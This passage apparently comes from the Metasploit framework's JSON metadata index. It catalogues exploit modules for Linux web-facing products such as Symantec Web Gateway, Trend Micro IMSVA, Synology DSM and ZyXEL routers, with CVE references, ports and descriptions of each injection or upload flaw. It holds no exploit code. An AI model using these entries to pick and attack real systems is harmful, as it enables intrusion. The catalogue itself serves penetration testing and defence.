"name": "Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",
"full_name": "exploit/linux/http/sophos_wpa_sblistpack_exec",
"rank": 600,
"disclosure_date": "2013-09-06",
"type": "exploit",
"author": [
"Francisco Falcon",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability on Sophos Web Protection Appliance\n 3.7.9, 3.8.0 and 3.8.1. The vulnerability exists on the sblistpack component, reachable\n from the web interface without authentication. This module has been tested successfully\n on Sophos Virtual Web Appliance 3.7.0.",
"references": [
"CVE-2013-4983",
"OSVDB-97029",
"BID-62263",
"EDB-28175",
"URL-http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Sophos Web Protection Appliance 3.7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/sophos_wpa_sblistpack_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/spark_unauth_rce": {
"name": "Apache Spark Unauthenticated Command Execution",
"full_name": "exploit/linux/http/spark_unauth_rce",
"rank": 600,
"disclosure_date": "2017-12-12",
"type": "exploit",
"author": [
"Fengwei Zhang",
"Imran Rashid",
"aRe00t",
"Green-m <greenm.xxoo@gmail.com>"
],
"description": "This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.\n It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.",
"references": [
"CVE-2018-11770",
"URL-https://www.jianshu.com/p/a080cb323832",
"URL-https://github.com/vulhub/vulhub/tree/master/spark/unacc"
],
"platform": "Java",
"arch": "java",
"rport": 6066,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-14 15:28:08 +0000",
"path": "/modules/exploits/linux/http/spark_unauth_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/spark_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_linux/http/supervisor_xmlrpc_exec": {
"name": "Supervisor XML-RPC Authenticated Remote Code Execution",
"full_name": "exploit/linux/http/supervisor_xmlrpc_exec",
"rank": 600,
"disclosure_date": "2017-07-19",
"type": "exploit",
"author": [
"Calum Hutton <c.e.hutton@gmx.com>"
],
"description": "This module exploits a vulnerability in the Supervisor process control software, where an authenticated client\n can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.\n The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this\n may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been\n configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.",
"references": [
"URL-https://github.com/Supervisor/supervisor/issues/964",
"URL-https://www.debian.org/security/2017/dsa-3942",
"URL-https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610",
"URL-https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610",
"CVE-2017-11610"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 9001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"3.0a1-3.3.2"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/supervisor_xmlrpc_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_messaging_gateway_exec": {
"name": "Symantec Messaging Gateway Remote Code Execution",
"full_name": "exploit/linux/http/symantec_messaging_gateway_exec",
"rank": 600,
"disclosure_date": "2017-04-26",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits the command injection vulnerability of Symantec Messaging Gateway product. An authenticated user can execute a\n terminal command under the context of the web server user which is root.\n\n backupNow.do endpoint takes several user inputs and then pass them to the internal service which is responsible for executing\n operating system command. One of the user input is being passed to the service without proper validation. That cause a command\n injection vulnerability. But given parameters, such a SSH ip address, port and credentials are validated before executing terminal\n command. Thus, you need to configure your own SSH service and set the required parameter during module usage.\n\n This module was tested against Symantec Messaging Gateway 10.6.2-7.",
"references": [
"URL-https://pentest.blog/unexpected-journey-5-from-weak-password-to-rce-on-symantec-messaging-gateway/",
"CVE-2017-6326"
],
"platform": "Python",
"arch": "python",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_messaging_gateway_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_web_gateway_exec": {
"name": "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",
"full_name": "exploit/linux/http/symantec_web_gateway_exec",
"rank": 600,
"disclosure_date": "2012-05-17",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability found in Symantec Web\n Gateway's HTTP service due to the insecure usage of the exec() function. This module\n abuses the spywall/ipchange.php file to execute arbitrary OS commands without\n authentication.",
"references": [
"CVE-2012-0297",
"OSVDB-82925",
"BID-53444",
"ZDI-12-090",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Web Gateway 5.0.2.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/symantec_web_gateway_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_web_gateway_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_web_gateway_file_upload": {
"name": "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",
"full_name": "exploit/linux/http/symantec_web_gateway_file_upload",
"rank": 600,
"disclosure_date": "2012-05-17",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a file upload vulnerability found in Symantec Web Gateway's\n HTTP service. Due to the incorrect use of file extensions in the upload_file()\n function, attackers may to abuse the spywall/blocked_file.php file in order to\n upload a malicious PHP file without any authentication, which results in arbitrary\n code execution.",
"references": [
"CVE-2012-0299",
"OSVDB-82025",
"BID-53443",
"ZDI-12-091",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Web Gateway 5.0.2.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_web_gateway_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_web_gateway_lfi": {
"name": "Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability",
"full_name": "exploit/linux/http/symantec_web_gateway_lfi",
"rank": 600,
"disclosure_date": "2012-05-17",
"type": "exploit",
"author": [
"Unknown",
"muts",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Symantec Web Gateway's HTTP\n service. By injecting PHP code in the access log, it is possible to load it\n with a directory traversal flaw, which allows remote code execution under the\n context of 'apache'. Please note that it may take up to several minutes to\n retrieve access_log, which is about the amount of time required to see a shell\n back.",
"references": [
"CVE-2012-0297",
"OSVDB-82023",
"EDB-18932",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Web Gateway 5.0.2.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/symantec_web_gateway_lfi.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_web_gateway_lfi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_web_gateway_pbcontrol": {
"name": "Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",
"full_name": "exploit/linux/http/symantec_web_gateway_pbcontrol",
"rank": 600,
"disclosure_date": "2012-07-23",
"type": "exploit",
"author": [
"muts",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability found in Symantec Web\n Gateway's HTTP service. While handling the filename parameter, the Spywall API\n does not do any filtering before passing it to an exec() call in proxy_file(),\n thus results in remote code execution under the context of the web server. Please\n note authentication is NOT needed to gain access.",
"references": [
"CVE-2012-2953",
"OSVDB-84120",
"BID-54426",
"EDB-20088",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Web Gateway 5.0.2.18"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_web_gateway_pbcontrol",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_web_gateway_restore": {
"name": "Symantec Web Gateway 5 restore.php Post Authentication Command Injection",
"full_name": "exploit/linux/http/symantec_web_gateway_restore",
"rank": 600,
"disclosure_date": "2014-12-16",
"type": "exploit",
"author": [
"Egidio Romano",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability found in Symantec Web\n Gateway's setting restoration feature. The filename portion can be used to inject\n system commands into a syscall function, and gain control under the context of\n HTTP service.\n\n For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user.\n However, for version 5.2.1, you must be an administrator.",
"references": [
"CVE-2014-7285",
"OSVDB-116009",
"BID-71620",
"URL-http://karmainsecurity.com/KIS-2014-19",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Web Gateway 5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/symantec_web_gateway_restore.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_web_gateway_restore",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/synology_dsm_sliceupload_exec_noauth": {
"name": "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",
"full_name": "exploit/linux/http/synology_dsm_sliceupload_exec_noauth",
"rank": 600,
"disclosure_date": "2013-10-31",
"type": "exploit",
"author": [
"Markus Wulftange"
],
"description": "This module exploits a vulnerability found in Synology DiskStation Manager (DSM)\n versions 4.x, which allows the execution of arbitrary commands under root\n privileges.\n The vulnerability is located in /webman/imageSelector.cgi, which allows to append\n arbitrary data to a given file using a so called SLICEUPLOAD functionality, which\n can be triggered by an unauthenticated user with a specially crafted HTTP request.\n This is exploited by this module to append the given commands to /redirect.cgi,\n which is a regular shell script file, and can be invoked with another HTTP request.\n Synology reported that the vulnerability has been fixed with versions 4.0-2259,\n 4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.",
"references": [
"CVE-2013-6955",
"OSVDB-101247"
],
"platform": "Unix",
"arch": "cmd",
"rport": 5000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/synology_dsm_sliceupload_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/tiki_calendar_exec": {
"name": "Tiki-Wiki CMS Calendar Command Execution",
"full_name": "exploit/linux/http/tiki_calendar_exec",
"rank": 600,
"disclosure_date": "2016-06-06",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"Dany Ouellet"
],
"description": "Tiki-Wiki CMS's calendar module contains a remote code execution\n vulnerability within the viewmode GET parameter.\n The calendar module is NOT enabled by default. If enabled,\n the default permissions are set to NOT allow anonymous users\n to access.\n\n Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14\n Verified/Tested against 14.1",
"references": [
"EDB-39965",
"URL-https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/tiki_calendar_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/tiki_calendar_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/tp_link_sc2020n_authenticated_telnet_injection": {
"name": "TP-Link SC2020n Authenticated Telnet Injection",
"full_name": "exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection",
"rank": 600,
"disclosure_date": "2015-12-20",
"type": "exploit",
"author": [
"Nicholas Starke <nick@alephvoid.com>"
],
"description": "The TP-Link SC2020n Network Video Camera is vulnerable\n to OS Command Injection via the web interface. By firing up the telnet daemon,\n it is possible to gain root on the device. The vulnerability\n exists at /cgi-bin/admin/servetest, which is accessible with credentials.",
"references": [
"CVE-2013-2578"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
23,
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"telnet",
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb",
"is_install_path": true,
"ref_name": "linux/http/tp_link_sc2020n_authenticated_telnet_injection",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/tr064_ntpserver_cmdinject": {
"name": "Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064",
"full_name": "exploit/linux/http/tr064_ntpserver_cmdinject",
"rank": 300,
"disclosure_date": "2016-11-07",
"type": "exploit",
"author": [
"Kenzo",
"Michael Messner <devnull@s3cur1ty.de>",
"todb <todb@metasploit.com>",
"wvu <wvu@metasploit.com>",
"0x27"
],
"description": "Broadband DSL modems manufactured by Zyxel and distributed by some\n European ISPs are vulnerable to a command injection vulnerability when setting\n the 'NewNTPServer' value using the TR-64 SOAP-based configuration protocol. In\n the tested case, no authentication is required to set this value on affected\n DSL modems.\n\n This exploit was originally tested on firmware versions up to 2.00(AADU.5)_20150909.",
"references": [
"CVE-2016-10372",
"EDB-40740",
"URL-https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/",
"URL-https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759",
"URL-https://broadband-forum.org/technical/download/TR-064.pdf"
],
"platform": "",
"arch": "",
"rport": 7547,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Big Endian",
"MIPS Little Endian"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/http/tr064_ntpserver_cmdinject.rb",
"is_install_path": true,
"ref_name": "linux/http/tr064_ntpserver_cmdinject",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/trend_micro_imsva_exec": {
"name": "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
"full_name": "exploit/linux/http/trend_micro_imsva_exec",
"rank": 600,
"disclosure_date": "2017-01-15",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a command injection vulnerability in the Trend Micro\n IMSVA product. An authenticated user can execute a terminal command under\n the context of the web server user which is root. Besides, default installation\n of IMSVA comes with a default administrator credentials.\n\n saveCert.imss endpoint takes several user inputs and performs blacklisting.\n After that it use them as argument of predefined operating system command\n without proper sanitation. However, due to improper blacklisting rule it's possible to inject\n arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.\n\n This module was tested against IMSVA 9.1-1600.",
"references": [
"CVE-2017-6398",
"URL-https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/"
],
"platform": "Python",
"arch": "python",
"rport": 8445,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/http/trend_micro_imsva_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/trend_micro_imsva_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/trendmicro_imsva_widget_exec": {
"name": "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
"full_name": "exploit/linux/http/trendmicro_imsva_widget_exec",
"rank": 600,
"disclosure_date": "2017-10-07",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product\n have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which\n leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process\n does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.",
"references": [
"URL-https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/",
"URL-http://www.zerodayinitiative.com/advisories/ZDI-17-521/"
],
"platform": "Python",
"arch": "python",
"rport": 8445,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-10 09:37:24 +0000",
"path": "/modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/trendmicro_imsva_widget_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/trendmicro_sps_exec": {
"name": "Trend Micro Smart Protection Server Exec Remote Code Injection",
"full_name": "exploit/linux/http/trendmicro_sps_exec",
"rank": 600,
"disclosure_date": "2016-08-08",
"type": "exploit",
"author": [
"Quentin Kaiser <kaiserquentin@gmail.com>"
],
"description": "This module exploits a vulnerability found in TrendMicro Smart Protection Server where untrusted inputs are fed to ServWebExec system command, leading to command injection.\n Please note: authentication is required to exploit this vulnerability.",
"references": [
"CVE-2016-6267"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/trendmicro_sps_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/trendmicro_sps_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/trueonline_billion_5200w_rce": {
"name": "TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection",
"full_name": "exploit/linux/http/trueonline_billion_5200w_rce",
"rank": 600,
"disclosure_date": "2016-12-26",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "TrueOnline is a major ISP in Thailand, and it distributes a customized version of\n the Billion 5200W-T router. This customized version has at least two command injection\n vulnerabilities, one authenticated and one unauthenticated, on different firmware versions.\n This module will attempt to exploit the unauthenticated injection first, and if that fails,\n it will attempt to exploit the authenticated injection.\n This module was tested in an emulated environment, as the author doesn't have access to the\n Thai router any more. Any feedback should be sent directly to the module's author, as well as\n to the Metasploit project.\n There are other language strings in the firmware, so it is likely that this firmware is not\n only distributed in Thailand. Other Billion 5200W-T in other countries might be vulnerable too.",
"references": [
"URL-https://seclists.org/fulldisclosure/2017/Jan/40",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt",
"URL-https://blogs.securiteam.com/index.php/archives/2910"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Billion 5200W-T"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/trueonline_billion_5200w_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/trueonline_billion_5200w_rce",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/trueonline_p660hn_v1_rce": {
"name": "TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection",
"full_name": "exploit/linux/http/trueonline_p660hn_v1_rce",
"rank": 600,
"disclosure_date": "2016-12-26",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "TrueOnline is a major ISP in Thailand, and it distributes a customized version of\n the ZyXEL P660HN-T v1 router. This customized version has an unauthenticated command\n injection vulnerability in the remote log forwarding page.\n This module was tested in an emulated environment, as the author doesn't have access to the\n Thai router any more. Any feedback should be sent directly to the module's author, as well as\n to the Metasploit project.\n There are other language strings in the firmware, so it is likely that this firmware is not only\n distributed in Thailand. Other P660HN-T v1 in other countries might be vulnerable too.",
"references": [
"URL-https://seclists.org/fulldisclosure/2017/Jan/40",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt",
"URL-https://blogs.securiteam.com/index.php/archives/2910"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"P660HN-T v1"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/trueonline_p660hn_v1_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/trueonline_p660hn_v2_rce": {
"name": "TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection",
"full_name": "exploit/linux/http/trueonline_p660hn_v2_rce",
"rank": 600,
"disclosure_date": "2016-12-26",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "TrueOnline is a major ISP in Thailand, and it distributes a customized version of\n the ZyXEL P660HN-T v2 router. This customized version has an authenticated command injection\n vulnerability in the remote log forwarding page. This can be exploited using the \"supervisor\"\n account that comes with a default password on the device.\n This module was tested in an emulated environment, as the author doesn't have access to the\n Thai router any more. Any feedback should be sent directly to the module's author, as well as\n to the Metasploit project. Note that the inline payloads work best.\n There are Turkish and other language strings in the firmware, so it is likely that this\n firmware is not only distributed in Thailand. Other P660HN-T v2 in other countries might be\n vulnerable too.",
"references": [
"URL-https://seclists.org/fulldisclosure/2017/Jan/40",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt",
"URL-https://blogs.securiteam.com/index.php/archives/2910"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"P660HN-T v2"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/trueonline_p660hn_v2_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/ueb_api_rce": {
"name": "Unitrends UEB http api remote code execution",
"full_name": "exploit/linux/http/ueb_api_rce",
"rank": 600,
"disclosure_date": "2017-08-08",
"type": "exploit",
"author": [
"Cale Smith",
"Benny Husted",
"Jared Arave",
"h00die"
],
"description": "It was discovered that the api/storage web interface in Unitrends Backup (UB)\n before 10.0.0 has an issue in which one of its input parameters was not validated.\n A remote attacker could use this flaw to bypass authentication and execute arbitrary\n commands with root privilege on the target system.\n UEB v9 runs the api under root privileges and api/storage is vulnerable.\n UEB v10 runs the api under limited privileges and api/hosts is vulnerable.",
"references": [
"URL-https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756",
"URL-https://support.unitrends.com/UnitrendsBackup/s/article/000006002",
"URL-https://nvd.nist.gov/vuln/detail/CVE-2017-12478",
"URL-http://blog.redactedsec.net/exploits/2018/01/29/UEB9.html",
"EDB-44297",
"CVE-2017-12478",
"CVE-2018-6328"
],
"platform": "Linux",
"arch": "x86",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"UEB 9.*",
"UEB < 10.1.0"
],
"mod_time": "2019-01-09 20:28:53 +0000",
"path": "/modules/exploits/linux/http/ueb_api_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/ueb_api_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/vap2500_tools_command_exec": {
"name": "Arris VAP2500 tools_command.php Command Execution",
"full_name": "exploit/linux/http/vap2500_tools_command_exec",
"rank": 300,
"disclosure_date": "2014-11-25",
"type": "exploit",
"author": [
"HeadlessZeke"
],
"description": "Arris VAP2500 access points are vulnerable to OS command injection in the web management\n portal via the tools_command.php page. Though authentication is required to access this\n page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid\n username.",
"references": [
"CVE-2014-8423",
"CVE-2014-8424",
"OSVDB-115045",
"OSVDB-115046",
"BID-71297",
"BID-71299",
"URL-http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/vap2500_tools_command_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/vap2500_tools_command_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/vcms_upload": {
"name": "V-CMS PHP File Upload and Execute",
"full_name": "exploit/linux/http/vcms_upload",
"rank": 600,
"disclosure_date": "2011-11-27",
"type": "exploit",
"author": [
"AutoSec Tools",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found on V-CMS's inline image upload feature.\n The problem is due to the inline_image_upload.php file not checking the file type\n before saving it on the web server. This allows any malicious user to upload a\n script (such as PHP) without authentication, and then execute it with a GET request.\n\n The issue is fixed in 1.1 by checking the extension name. By default, 1.1 only\n allows jpg, jpeg, png, gif, bmp, but it is still possible to upload a PHP file as\n one of those extension names, which may still be leveraged in an attack.",
"references": [
"CVE-2011-4828",
"OSVDB-77183",
"BID-50706",
"URL-http://xforce.iss.net/xforce/xfdb/71358"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/vcms_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/vcms_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/wanem_exec": {
"name": "WAN Emulator v2.3 Command Execution",
"full_name": "exploit/linux/http/wanem_exec",
"rank": 600,
"disclosure_date": "2012-08-12",
"type": "exploit",
"author": [
